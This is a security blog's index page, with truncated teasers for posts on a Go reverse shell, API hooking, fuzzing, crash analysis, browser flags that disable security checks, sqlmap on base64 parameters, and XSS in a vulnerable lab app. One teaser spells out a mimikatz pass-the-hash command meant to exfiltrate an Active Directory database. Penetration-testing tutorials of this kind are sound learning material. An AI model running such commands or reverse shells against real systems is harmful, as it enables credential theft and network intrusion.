Latest Posts Under: Security

Here is a really small Go reverse shell (30-ish lines of code that includes comments). Environment setup: Download/install Go from here. If you use Windows, you may want to download/install the TDM-GCC compiler from here as well. Code: First, we need to define what libraries we need: import “net” import “fmt” import “bufio” import “os/exec”… Read Article →

Below is a basic example on how to use the detours library to hook APIs. #include <stdio.h> #include <windows.h> #include <detours.h> // API that we want to hook DWORD (WINAPI * Real_SleepEx)(DWORD dwMilliseconds, BOOL bAlertable) = SleepEx; // This function will be called *before* the API. // We will modify one of the parameters //… Read Article →

I’ve made some changes to bytefuzz to support files generated by other fuzzers. I’ve used the domato fuzzer to generate 1000 html files and then through bytefuzz, I’ve sent those files to a browser that I use when I do web app security testing. And soon enough, I got some interesting results… 🙂  

Let’s assume you have a program that just crashed and you have a core dump. You can enable core dumps by using the ulimit -c unlimited command. If you want to analyze what happened, here are some steps you can follow: //This will switch the disassembly listing to intel format. (gdb) set disassembly-flavor intel //To… Read Article →

If you want to do web app security testing using either Chrome or Chromium, you may want to disable a few security options so you can actually go through your test cases. You can use the same command line parameters for both of them: /usr/bin/chromium –disable-web-security –disable-xss-auditor –ignore-certificate-errors –user-data-dir=/pentesting/web/temp/data –proxy-server= This works for both Linux… Read Article →

If you have a hash for either a domain admin or a local admin on a domain controller, you can use mimikatz to exfil the entire Active Directory database. From mimikatz, run the following command to spawn a shell as the target user: sekurlsa::pth /user:<username> /domain:<domainname> /ntlm:<hash> /run:cmd.exe Now you have a few options from… Read Article →

Today we’re going to look at using sqlmap when the target website uses base64 encoded parameters. For example, we have something like: http://<target>/products/article.php?art_id=<base64_encoded_value> In this case we have to “convince” sqlmap that when scanning, to use base64 for all payloads. Well, I guess it’s a good thing that sqlmap has the following option which allows… Read Article →

In this post we’ll have a look at the nodejs XSS attack/exploit in XVNA (eXtreme Vulnerable Node Application). Cross-site scripting is part of the OWASP Top 10 list that was published in 2017. We’ll use the setup detailed here (XVNA runs on port 80). As a web proxy, Burp or ZAP are highly recommended, but you can use anything else that allows you… Read Article →

Scroll To Top